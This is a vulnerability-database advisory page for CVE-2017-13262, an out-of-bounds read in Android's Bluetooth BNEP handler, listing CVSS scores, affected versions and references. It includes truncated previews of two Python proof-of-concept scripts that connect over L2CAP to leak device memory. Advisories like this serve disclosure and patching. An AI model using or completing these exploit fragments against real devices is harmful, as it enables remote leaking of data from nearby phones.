Published: 04/04/2018 Updated: 08/05/2018

CVSS v2 Base Score: 3.3 | Impact Score: 2.9 | Exploitability Score: 6.5

CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8

VMScore: 340

Vector: AV:A/AC:L/Au:N/C:P/I:N/A:N

In bnep_data_ind of bnep_main.cc, there is a possible out of bounds read due to a missing length decrement operation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1. Android ID: A-69271284.

Vulnerable Product	Search on Vulmon	Subscribe to Product
google android 6.0
google android 7.0
google android 7.1.1
google android 7.1.2
google android 8.0
google android 8.1
google android 5.1.1
google android 6.0.1

import os import sys import struct import bluetooth BNEP_PSM = 15 BNEP_FRAME_CONTROL = 0x01 # Control types (parsed by bnep_process_control_packet() in bnep_utilscc) BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01 def oob_read(src_bdaddr, dst): bnep = bluetoothBluetoothSocket(bluetoothL2CAP) bnepsettimeout(5) bnepbind((src_bdaddr, ...

import os import sys import struct import bluetooth BNEP_PSM = 15 BNEP_FRAME_COMPRESSED_ETHERNET = 0x02 LEAK_ATTEMPTS = 20 def leak(src_bdaddr, dst): bnep = bluetoothBluetoothSocket(bluetoothL2CAP) bnepsettimeout(5) bnepbind((src_bdaddr, 0)) print 'Connecting to BNEP' bnepconnect((dst, BNEP_PSM)) bnepsettimeout( ...

CWE-125 https://source.android.com/security/bulletin/2018-03-01 https://www.exploit-db.com/exploits/44327/https://www.exploit-db.com/exploits/44326/http://www.securityfocus.com/bid/103253 https://nvd.nist.gov https://www.exploit-db.com/exploits/44327/

CVE-2017-13262

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect